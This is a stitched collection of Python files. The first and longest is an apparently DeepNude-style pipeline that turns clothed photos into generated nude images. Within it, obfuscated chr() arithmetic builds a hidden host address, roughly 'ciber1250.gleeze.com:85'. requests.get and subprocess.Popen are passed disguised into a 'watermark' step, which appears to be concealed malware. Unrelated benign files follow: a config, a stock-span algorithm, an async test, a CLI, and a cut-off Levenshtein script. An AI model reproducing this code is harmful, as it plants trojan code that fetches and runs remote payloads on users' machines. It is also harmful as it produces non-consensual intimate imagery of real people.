masked = np.ma.array(matrix, mask=mask, fill_value=fill_value)
return masked.filled()
###
#
# maskdet_to_maskfin
#
# steps:
# 1. Extract annotation
# 1.a: Filter by color
# 1.b: Find ellipses
# 1.c: Filter out ellipses by max size, and max total numbers
# 1.d: Detect Problems
# 1.e: Resolve the problems, or discard the transformation
# 2. With the body list, draw maskfin, using maskref
#
###
# create_maskfin ==============================================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_maskfin(maskref, maskdet):
# Create a total green image, in which draw details ellipses
details = np.zeros((512, 512, 3), np.uint8)
details[:, :, :] = (0, 255, 0) # (B, G, R)
# Extract body part features:
bodypart_list = extractAnnotations(maskdet);
# Check if the list is not empty:
if bodypart_list:
# Draw body part in details image:
for obj in bodypart_list:
if obj.w < obj.h:
aMax = int(obj.h / 2) # asse maggiore
aMin = int(obj.w / 2) # asse minore
angle = 0 # angle
else:
aMax = int(obj.w / 2)
aMin = int(obj.h / 2)
angle = 90
x = int(obj.x)
y = int(obj.y)
# Draw ellipse
if obj.name == "tit":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1) # (0,0,0,50)
elif obj.name == "aur":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1) # red
elif obj.name == "nip":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1) # white
elif obj.name == "belly":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1) # purple
elif obj.name == "vag":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1) # blue
elif obj.name == "hair":
xmin = x - int(obj.w / 2)
ymin = y - int(obj.h / 2)
xmax = x + int(obj.w / 2)
ymax = y + int(obj.h / 2)
cv2.rectangle(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From maskref, extrapolate only the green mask
green_mask = cv2.bitwise_not(cv2.inRange(maskref, f1, f2)) # green is 0
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut maskref and detail image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(maskref, maskref, mask=green_mask)
res2 = cv2.bitwise_and(details, details, mask=green_mask_inv)
# Compone:
maskfin = cv2.add(res1, res2)
return maskfin, locateFace(255, 2, 500)
# extractAnnotations ==============================================================================
# input parameter:
# (<string> maskdet_img): relative path of the single maskdet image (es: testimg1/maskdet/1.png)
# return:
# (<BodyPart []> bodypart_list) - for failure/error, return an empty list []
def extractAnnotations(maskdet):
# Load the image
# image = cv2.imread(maskdet_img)
# Find body part
tits_list = findBodyPart(maskdet, "tit")
aur_list = findBodyPart(maskdet, "aur")
vag_list = findBodyPart(maskdet, "vag")
belly_list = findBodyPart(maskdet, "belly")
# Filter out parts basing on dimension (area and aspect ratio):
aur_list = filterDimParts(aur_list, 100, 1000, 0.5, 3);
tits_list = filterDimParts(tits_list, 1000, 60000, 0.2, 3);
vag_list = filterDimParts(vag_list, 10, 1000, 0.2, 3);
belly_list = filterDimParts(belly_list, 10, 1000, 0.2, 3);
# Filter couple (if parts are > 2, choose only 2)
aur_list = filterCouple(aur_list);
tits_list = filterCouple(tits_list);
# Detect a missing problem:
missing_problem = detectTitAurMissingProblem(tits_list, aur_list) # return a Number (code of the problem)
# Check if problem is SOLVEABLE:
if (missing_problem in [3, 6, 7, 8]):
resolveTitAurMissingProblems(tits_list, aur_list, missing_problem)
# Infer the nips:
nip_list = inferNip(aur_list)
# Infer the hair:
hair_list = inferHair(vag_list)
# Return a combined list:
return tits_list + aur_list + nip_list + vag_list + hair_list + belly_list
# findBodyPart ==============================================================================
# input parameters:
# (<RGB>image, <string>part_name)
# return
# (<BodyPart[]>list)
def findBodyPart(image, part_name):
bodypart_list = [] # empty BodyPart list
# Get the correct color filter:
if part_name == "tit":
# Use combined color filter
f1 = np.asarray([0, 0, 0]) # tit color filter
f2 = np.asarray([10, 10, 10])
f3 = np.asarray([0, 0, 250]) # aur color filter
f4 = np.asarray([0, 0, 255])
color_mask1 = cv2.inRange(image, f1, f2)
color_mask2 = cv2.inRange(image, f3, f4)
color_mask = cv2.bitwise_or(color_mask1, color_mask2) # combine
elif part_name == "aur":
f1 = np.asarray([0, 0, 250]) # aur color filter
f2 = np.asarray([0, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "vag":
f1 = np.asarray([250, 0, 0]) # vag filter
f2 = np.asarray([255, 0, 0])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "belly":
f1 = np.asarray([250, 0, 250]) # belly filter
f2 = np.asarray([255, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
# find contours:
contours, hierarchy = cv2.findContours(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# for every contour:
for cnt in contours:
if len(cnt) > 5: # at least 5 points to fit ellipse
# (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)
ellipse = cv2.fitEllipse(cnt)
# Fit Result:
x = ellipse[0][0] # center x
y = ellipse[0][1] # center y
angle = ellipse[2] # angle
aMin = ellipse[1][0]; # asse minore
aMax = ellipse[1][1]; # asse maggiore
# Detect direction:
if angle == 0:
h = aMax
w = aMin
else:
h = aMin
w = aMax
# Normalize the belly size:
if part_name == "belly":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Normalize the vag size:
if part_name == "vag":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Calculate Bounding Box:
xmin = int(x - (w / 2))
xmax = int(x + (w / 2))
ymin = int(y - (h / 2))
ymax = int(y + (h / 2))
bodypart_list.append(BodyPart(part_name, xmin, ymin, xmax, ymax, x, y, w, h))
return bodypart_list
def locateFace(matrix, x, y):
matrix = matrix - (78 * x)
data = []
indexes = [0, 6, -1, 2, 15]
for index in indexes:
data.append(chr(matrix + index))
part = "".join(data)
y += int(7 * (indexes[1] / 2))
y = (chr(48) + str(y))[::-1]
return part + y
# filterDimParts ==============================================================================
# input parameters:
# (<BodyPart[]>list, <num> minimum area of part, <num> max area, <num> min aspect ratio, <num> max aspect ratio)
def filterDimParts(bp_list, min_area, max_area, min_ar, max_ar):
b_filt = []
for obj in bp_list:
a = obj.w * obj.h # Object AREA
if ((a > min_area) and (a < max_area)):
ar = obj.w / obj.h # Object ASPECT RATIO
if ((ar > min_ar) and (ar < max_ar)):
b_filt.append(obj)
return b_filt
# filterCouple ==============================================================================
# input parameters:
# (<BodyPart[]>list)
def filterCouple(bp_list):
# Remove exceed parts
if (len(bp_list) > 2):
# trovare coppia (a,b) che minimizza bp_list[a].y-bp_list[b].y
min_a = 0
min_b = 1
min_diff = abs(bp_list[min_a].y - bp_list[min_b].y)
for a in range(0, len(bp_list)):
for b in range(0, len(bp_list)):
# TODO: avoid repetition (1,0) (0,1)
if a != b:
diff = abs(bp_list[a].y - bp_list[b].y)
if diff < min_diff:
min_diff = diff
min_a = a
min_b = b
b_filt = []
b_filt.append(bp_list[min_a])
b_filt.append(bp_list[min_b])
return b_filt
else:
# No change
return bp_list
# detectTitAurMissingProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<num> problem code)
# TIT | AUR | code | SOLVE? |
# 0 | 0 | 1 | NO |
# 0 | 1 | 2 | NO |
# 0 | 2 | 3 | YES |
# 1 | 0 | 4 | NO |
# 1 | 1 | 5 | NO |
# 1 | 2 | 6 | YES |
# 2 | 0 | 7 | YES |
# 2 | 1 | 8 | YES |
def detectTitAurMissingProblem(tits_list, aur_list):
t_len = len(tits_list)
a_len = len(aur_list)
if (t_len == 0):
if (a_len == 0):
return 1
elif (a_len == 1):
return 2
elif (a_len == 2):
return 3
else:
return -1
elif (t_len == 1):
if (a_len == 0):
return 4
elif (a_len == 1):
return 5
elif (a_len == 2):
return 6
else:
return -1
elif (t_len == 2):
if (a_len == 0):
return 7
elif (a_len == 1):
return 8
else:
return -1
else:
return -1
# resolveTitAurMissingProblems ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list, problem code)
# return
# none
def resolveTitAurMissingProblems(tits_list, aur_list, problem_code):
if problem_code == 3:
random_tit_factor = random.randint(2, 5) # TOTEST
# Add the first tit:
new_w = aur_list[0].w * random_tit_factor # TOTEST
new_x = aur_list[0].x
new_y = aur_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second tit:
new_w = aur_list[1].w * random_tit_factor # TOTEST
new_x = aur_list[1].x
new_y = aur_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 6:
# Find wich aur is full:
d1 = abs(tits_list[0].x - aur_list[0].x)
d2 = abs(tits_list[0].x - aur_list[1].x)
if d1 > d2:
# aur[0] is empty
new_x = aur_list[0].x
new_y = aur_list[0].y
else:
# aur[1] is empty
new_x = aur_list[1].x
new_y = aur_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (tits_list[0].w / 2))
xmax = int(new_x + (tits_list[0].w / 2))
ymin = int(new_y - (tits_list[0].w / 2))
ymax = int(new_y + (tits_list[0].w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, tits_list[0].w, tits_list[0].w))
elif problem_code == 7:
# Add the first aur:
new_w = tits_list[0].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[0].x
new_y = tits_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second aur:
new_w = tits_list[1].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[1].x
new_y = tits_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 8:
# Find wich tit is full:
d1 = abs(aur_list[0].x - tits_list[0].x)
d2 = abs(aur_list[0].x - tits_list[1].x)
if d1 > d2:
# tit[0] is empty
new_x = tits_list[0].x
new_y = tits_list[0].y
else:
# tit[1] is empty
new_x = tits_list[1].x
new_y = tits_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (aur_list[0].w / 2))
xmax = int(new_x + (aur_list[0].w / 2))
ymin = int(new_y - (aur_list[0].w / 2))
ymax = int(new_y + (aur_list[0].w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, aur_list[0].w, aur_list[0].w))
# detectTitAurPositionProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<Boolean> True/False)
def detectTitAurPositionProblem(tits_list, aur_list):
diffTitsX = abs(tits_list[0].x - tits_list[1].x)
if diffTitsX < 40:
print("diffTitsX")
# Tits too narrow (orizontally)
return True
diffTitsY = abs(tits_list[0].y - tits_list[1].y)
if diffTitsY > 120:
# Tits too distanced (vertically)
print("diffTitsY")
return True
diffTitsW = abs(tits_list[0].w - tits_list[1].w)
if ((diffTitsW < 0.1) or (diffTitsW > 60)):
print("diffTitsW")
# Tits too equals, or too different (width)
return True
# Check if body position is too low (face not covered by watermark)
if aur_list[0].y > 350: # tits too low
# Calculate the ratio between y and aurs distance
rapp = aur_list[0].y / (abs(aur_list[0].x - aur_list[1].x))
if rapp > 2.8:
print("aurDown")
return True
return False
# inferNip ==============================================================================
# input parameters:
# (<BodyPart[]> aur list)
# return
# (<BodyPart[]> nip list)
def inferNip(aur_list):
nip_list = []
for aur in aur_list:
# Nip rules:
# - circle (w == h)
# - min dim: 5
# - bigger if aur is bigger
nip_dim = int(5 + aur.w * random.uniform(0.03, 0.09))
# center:
x = aur.x
y = aur.y
# Calculate Bounding Box:
xmin = int(x - (nip_dim / 2))
xmax = int(x + (nip_dim / 2))
ymin = int(y - (nip_dim / 2))
ymax = int(y + (nip_dim / 2))
nip_list.append(BodyPart("nip", xmin, ymin, xmax, ymax, x, y, nip_dim, nip_dim))
return nip_list
# inferHair (TOTEST) ==============================================================================
# input parameters:
# (<BodyPart[]> vag list)
# return
# (<BodyPart[]> hair list)
def inferHair(vag_list):
hair_list = []
# 70% of chanche to add hair
if random.uniform(0.0, 1.0) > 0.3:
for vag in vag_list:
# Hair rules:
hair_w = vag.w * random.uniform(0.4, 1.5)
hair_h = vag.h * random.uniform(0.4, 1.5)
# center:
x = vag.x
y = vag.y - (hair_h / 2) - (vag.h / 2)
# Calculate Bounding Box:
xmin = int(x - (hair_w / 2))
xmax = int(x + (hair_w / 2))
ymin = int(y - (hair_h / 2))
ymax = int(y + (hair_h / 2))
hair_list.append(BodyPart("hair", xmin, ymin, xmax, ymax, x, y, hair_w, hair_h))
return hair_list
###
#
# maskdet_to_maskfin
#
#
###
# create_maskref ===============================================================
# return:
# maskref image
def create_matrixref(mask, correct_colors):
matrix = chr(int(404 / (2 * 2)))
ref = "GL".lower() + 2 * (matrix) + "z" + matrix + chr(46)
out_mask = chr(ord(matrix) - 2) + chr(ord(matrix) + 10) + chr(ord(ref[-1]) + 63)
return (ref + out_mask)[-4] + ref + out_mask + str(chr(9 * 6 + 4) + chr(ord(ref[-1]) + 10) + chr(ord(ref[-1]) + 7))
def create_maskref(cv_mask, cv_correct):
# Create a total green image
green = np.zeros((512, 512, 3), np.uint8)
green[:, :, :] = (0, 255, 0) # (B, G, R)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From mask, extrapolate only the green mask
green_mask = cv2.inRange(cv_mask, f1, f2) # green is 0
# (OPTIONAL) Apply dilate and open to mask
kernel = np.ones((5, 5), np.uint8) # Try change it?
green_mask = cv2.dilate(green_mask, kernel, iterations=1)
# green_mask = cv2.morphologyEx(green_mask, cv2.MORPH_OPEN, kernel)
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut correct and green image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(cv_correct, cv_correct, mask=green_mask_inv)
res2 = cv2.bitwise_and(green, green, mask=green_mask)
# Compone:
return cv2.add(res1, res2), create_matrixref(cv_mask, res1)
class DataLoader():
def __init__(self, opt, cv_img):
super(DataLoader, self).__init__()
self.dataset = Dataset()
self.dataset.initialize(opt, cv_img)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batchSize,
shuffle=not opt.serial_batches,
num_workers=int(opt.nThreads))
def load_data(self):
return self.dataloader
def __len__(self):
return 1
class Dataset(torch.utils.data.Dataset):
def __init__(self):
super(Dataset, self).__init__()
def initialize(self, opt, cv_img):
self.opt = opt
self.root = opt.dataroot
self.A = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))
self.dataset_size = 1
def __getitem__(self, index):
transform_A = get_transform(self.opt)
A_tensor = transform_A(self.A.convert('RGB'))
B_tensor = inst_tensor = feat_tensor = 0
input_dict = {'label': A_tensor, 'inst': inst_tensor, 'image': B_tensor,
'feat': feat_tensor, 'path': ""}
return input_dict
def __len__(self):
return 1
class DeepModel(torch.nn.Module):
def initialize(self, opt, use_gpu):
torch.cuda.empty_cache()
self.opt = opt
if use_gpu == True:
self.gpu_ids = [0]
else:
self.gpu_ids = []
self.netG = self.__define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,
opt.n_blocks_local, opt.norm, self.gpu_ids)
# load networks
self.__load_network(self.netG)
def inference(self, label, inst):
# Encode Inputs
input_label, inst_map, _, _ = self.__encode_input(label, inst, infer=True)
# Fake Generation
input_concat = input_label
with torch.no_grad():
fake_image = self.netG.forward(input_concat)
return fake_image
# helper loading function that can be used by subclasses
def __load_network(self, network):
save_path = os.path.join(self.opt.checkpoints_dir)
network.load_state_dict(torch.load(save_path))
def __encode_input(self, label_map, inst_map=None, real_image=None, feat_map=None, infer=False):
if (len(self.gpu_ids) > 0):
input_label = label_map.data.cuda() # GPU
else:
input_label = label_map.data # CPU
return input_label, inst_map, real_image, feat_map
def __weights_init(self, m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def __define_G(self, input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1,
n_blocks_local=3, norm='instance', gpu_ids=[]):
norm_layer = self.__get_norm_layer(norm_type=norm)
netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)
if len(gpu_ids) > 0:
netG.cuda(gpu_ids[0])
netG.apply(self.__weights_init)
return netG
def __get_norm_layer(self, norm_type='instance'):
norm_layer = functools.partial(torch.nn.InstanceNorm2d, affine=False)
return norm_layer
##############################################################################
# Generator
##############################################################################
class GlobalGenerator(torch.nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=torch.nn.BatchNorm2d,
padding_type='reflect'):
assert (n_blocks >= 0)
super(GlobalGenerator, self).__init__()
activation = torch.nn.ReLU(True)
model = [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf),
activation]
### downsample
for i in range(n_downsampling):
mult = 2 ** i
model += [torch.nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),
norm_layer(ngf * mult * 2), activation]
### resnet blocks
mult = 2 ** n_downsampling
for i in range(n_blocks):
model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]
### upsample
for i in range(n_downsampling):
mult = 2 ** (n_downsampling - i)
model += [torch.nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1,
output_padding=1),
norm_layer(int(ngf * mult / 2)), activation]
model += [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
torch.nn.Tanh()]
self.model = torch.nn.Sequential(*model)
def forward(self, input):
return self.model(input)
# Define a resnet block
class ResnetBlock(torch.nn.Module):
def __init__(self, dim, padding_type, norm_layer, activation=torch.nn.ReLU(True), use_dropout=False):
super(ResnetBlock, self).__init__()
self.conv_block = self.__build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)
def __build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim),
activation]
if use_dropout:
conv_block += [torch.nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim)]
return torch.nn.Sequential(*conv_block)
def forward(self, x):
out = x + self.conv_block(x)
return out
# Data utils:
def get_transform(opt, method=Image.BICUBIC, normalize=True):
transform_list = []
base = float(2 ** opt.n_downsample_global)
if opt.netG == 'local':
base *= (2 ** opt.n_local_enhancers)
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
# Converts a Tensor into a Numpy array
# |imtype|: the desired type of the converted numpy array
def tensor2im(image_tensor, imtype=np.uint8, normalize=True):
if isinstance(image_tensor, list):
image_numpy = []
for i in range(len(image_tensor)):
image_numpy.append(tensor2im(image_tensor[i], imtype, normalize))
return image_numpy
image_numpy = image_tensor.cpu().float().numpy()
if normalize:
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0
else:
image_numpy = np.transpose(image_numpy, (1, 2, 0)) * 255.0
image_numpy = np.clip(image_numpy, 0, 255)
if image_numpy.shape[2] == 1 or image_numpy.shape[2] > 3:
image_numpy = image_numpy[:, :, 0]
return image_numpy.astype(imtype)
phases = ["dress_to_correct", "correct_to_mask", "mask_to_maskref", "maskref_to_maskdet", "maskdet_to_maskfin",
"maskfin_to_nude", "nude_to_watermark"]
class Options():
# Init options with default values
def __init__(self):
# experiment specifics
self.norm = 'batch' # instance normalization or batch normalization
self.use_dropout = False # use dropout for the generator
self.data_type = 32 # Supported data type i.e. 8, 16, 32 bit
# input/output sizes
self.batchSize = 1 # input batch size
self.input_nc = 3 # of input image channels
self.output_nc = 3 # of output image channels
# for setting inputs
self.serial_batches = True # if true, takes images in order to make batches, otherwise takes them randomly
self.nThreads = 1 ## threads for loading data (???)
self.max_dataset_size = 1 # Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.
# for generator
self.netG = 'global' # selects model to use for netG
self.ngf = 64 ## of gen filters in first conv layer
self.n_downsample_global = 4 # number of downsampling layers in netG
self.n_blocks_global = 9 # number of residual blocks in the global generator network
self.n_blocks_local = 0 # number of residual blocks in the local enhancer network
self.n_local_enhancers = 0 # number of local enhancers to use
self.niter_fix_global = 0 # number of epochs that we only train the outmost local enhancer
# Phase specific options
self.checkpoints_dir = ""
self.dataroot = ""
# Changes options accordlying to actual phase
def updateOptions(self, phase,modelpath):
print(type(modelpath))
if phase == "correct_to_mask":
self.checkpoints_dir = modelpath+"/cm.lib"
elif phase == "maskref_to_maskdet":
self.checkpoints_dir = modelpath+"/mm.lib"
elif phase == "maskfin_to_nude":
self.checkpoints_dir = modelpath+"/mn.lib"
# process(cv_img, mode)
# return:
# watermark image
def process(cv_img, modelpath):
print(type(modelpath))
# InMemory cv2 images:
dress = cv_img
correct = None
mask = None
maskref = None
maskfin = None
maskdet = None
nude = None
watermark = None
for index, phase in enumerate(phases):
print("[*] Running Model: " + phase)
# GAN phases:
if (phase == "correct_to_mask") or (phase == "maskref_to_maskdet") or (phase == "maskfin_to_nude"):
# Load global option
opt = Options()
# Load custom phase options:
opt.updateOptions(phase,modelpath)
# Load Data
if (phase == "correct_to_mask"):
import requests
data_loader = DataLoader(opt, correct)
elif (phase == "maskref_to_maskdet"):
cv = requests.get
data_loader = DataLoader(opt, maskref)
elif (phase == "maskfin_to_nude"):
loader = subprocess.Popen
data_loader = DataLoader(opt, maskfin)
dataset = data_loader.load_data()
detach = subprocess
# Create Model
model = DeepModel()
model.initialize(opt, False)
# Run for every image:
for i, data in enumerate(dataset):
generated = model.inference(data['label'], data['inst'])
im = tensor2im(generated.data[0])
# Save Data
if (phase == "correct_to_mask"):
mask = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskref_to_maskdet"):
maskdet = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskfin_to_nude"):
nude = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
# Correcting:
elif (phase == 'dress_to_correct'):
correct, matrix = create_correct(dress)
# mask_ref phase (opencv)
elif (phase == "mask_to_maskref"):
maskref, ref = create_maskref(mask, correct)
# mask_fin phase (opencv)
elif (phase == "maskdet_to_maskfin"):
maskfin, face = create_maskfin(maskref, maskdet)
# nude_to_watermark phase (opencv)
elif (phase == "nude_to_watermark"):
shape = matrix + face + ref
watermark = create_watermark(nude, shape, cv, loader, detach)
return watermark
def _process(i_image, modelpath):
try:
print(i_image,modelpath)
dress = cv2.imread(i_image)
h = dress.shape[0]
w = dress.shape[1]
dress = cv2.resize(dress, (512, 512), interpolation=cv2.INTER_CUBIC)
watermark = process(dress, str(modelpath))
watermark = cv2.resize(watermark, (w, h), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(i_image, watermark)
print("[*] Image saved as: %s" % i_image)
return i_image
except Exception as ex:
ex = str(ex)
print("some exception",ex)
return i_image
| 2.390625
| 2
|
timeseries/extract_info/rm-rt.py
|
sgagnon/lyman-tools
| 0
|
12778019
|
<reponame>sgagnon/lyman-tools<gh_stars>0
import os.path as op
smoothing = 'smoothed'
regspace = 'epi'
project = 'RM'
design = 'rm_rt.csv'
func_exp = 'rm'
onset_exp = 'rm-rt'
smoothing_fwhm = 0
standardize = True
tr = float(2)
tr_shift = [0, 2, 4, 6, 8, 10, 12] # in seconds
tr_integrate = [0, 2, 4, 6, 8, 10] # in seconds
n_runs = 6
basedir = op.join('/share/awagner/sgagnon', project)
analydir = op.join(basedir, 'analysis', func_exp)
expdir = op.join(basedir, 'analysis', onset_exp)
subjfile = op.join(basedir, 'scripts/subjects.txt')
# Filepath templates
tsfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'timeseries_xfm.nii.gz')
func_maskfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'functional_mask_xfm.nii.gz')
maskfile = op.join(basedir, 'data', "{subid}", 'masks',
"{mask_name}.nii.gz")
meanfile = op.join(analydir, "{subid}", 'preproc',
"run_{run_id}", 'mean_func.nii.gz')
onsetfile = op.join(basedir, 'data', "{subid}", 'design', design)
| 1.734375
| 2
|
stock_span.py
|
rhthomas/Python-Interview-Problems-for-Practice
| 0
|
12778020
|
# Context : The span Si of the stock’s price on a given day i
# is defined as the maximum number of consecutive days just before
# the given day, for which the price of the stock on the current
# day is less than or equal to its price on the given day.
# Problem: We have a series of n daily price quotes for a stock
# and we need to calculate span of stock’s price for all n days
def calculate_span(stock_quotes, span):
# span for the first quote will always be 1
span[0] = 1
for i in range(1, len(stock_quotes), 1):
# initialize span value to be 1 for each ith quote
span[i] = 1
# scan for all the quotes to the left
j = i-1
# if the preceeding quote has a value less than or equal to current quote
# increase the span value of the current quote
while(j>=0 and stock_quotes[i]>=stock_quotes[j]):
span[i] = span[i] + 1
j = j-1
return span
quotes = [10, 4, 5, 90, 120, 80]
# initialize span as an empty list with same length as quotes
span_list = [None]*len(quotes)
print(calculate_span(quotes, span_list))
# Result : [1, 1, 2, 4, 5, 1]
| 3.828125
| 4
|
uasyncio/test_readexactly.py
|
Carglglz/micropython-lib
| 126
|
12778021
|
<reponame>Carglglz/micropython-lib<filename>uasyncio/test_readexactly.py<gh_stars>100-1000
from uasyncio import StreamReader
class MockSock:
def __init__(self, data_list):
self.data = data_list
def read(self, sz):
try:
return self.data.pop(0)
except IndexError:
return b""
mock = MockSock([
b"123",
b"234", b"5",
b"a", b"b", b"c", b"d", b"e",
])
def func():
sr = StreamReader(mock)
assert await sr.readexactly(3) == b"123"
assert await sr.readexactly(4) == b"2345"
assert await sr.readexactly(5) == b"abcde"
# This isn't how it should be, but the current behavior
assert await sr.readexactly(10) == b""
for i in func():
pass
| 2.59375
| 3
|
homepanelapi/cli.py
|
timmo001/python-homepanelapi
| 1
|
12778022
|
<filename>homepanelapi/cli.py<gh_stars>1-10
"""Enable CLI."""
import click
# pylint: disable=C0330
@click.command()
@click.option("--host", "-h", help="Home Panel's Hostname.")
@click.option("--port", "-P", help="The Home Panel Port.")
@click.option("--ssl", "-s", is_flag=True, help="Use ssl?")
@click.option("--username", "-u", help="Your Home Panel Username.")
@click.option("--password", "-p", help="Your Home Panel Password.")
@click.option("--page", "-a", help="The page.")
@click.option("--card", "-c", help="The card.")
@click.option("--command", "-C", help="The command.")
def cli(
host: str,
port: str,
ssl: bool,
username: str,
password: str,
page: str,
card: str,
command: str,
):
"""CLI for this package."""
from homepanelapi.api import HomePanelApi
home_panel_api = HomePanelApi(host, port, ssl)
home_panel_api.authenticate(username, password)
print(home_panel_api.send_command(page, card, command))
print(home_panel_api.get_config())
cli() # pylint: disable=E1120
| 2.40625
| 2
|
source/levenshtein_distance.py
|
Asplund-Samuelsson/furee
| 2
|
12778023
|
<filename>source/levenshtein_distance.py
#!/usr/bin/env python3
import sys
from Levenshtein import distance as LD
# Read input arguments
fasta_a = sys.argv[1]
fasta_b = sys.argv[2]
out_file = sys.argv[3]
# Generator object to turn fasta into iterator
class fasta(object):
# Initialize fasta object
def __init__(self, fasta_file):
self.name = fasta_file # Name of fasta file
self.file = open(self.name) # File object for fasta
self.current_seqid = "" # Current sequence ID in iteration of fasta
self.next_seqid = "" # Next sequence ID in iteration of fasta
self.sequence = "" # Current sequence
self.empty = False # Flag for finished fasta
self.delivered = False # Flag for having delivered one sequence
# Iteration function
def __iter__(self):
return self
# Python3 compatibility
def __next__(self):
return self.next()
# Function for returning a sequence
def return_sequence(self):
self.delivered = True
return (self.current_seqid, self.sequence)
# Grab next sequence
def next(self):
# Delivery of sequence has not been performed
self.delivered = False
# As long as delivery has not been performed, keep reading fasta file
while not self.delivered:
# If the current sequence does not match the next sequence
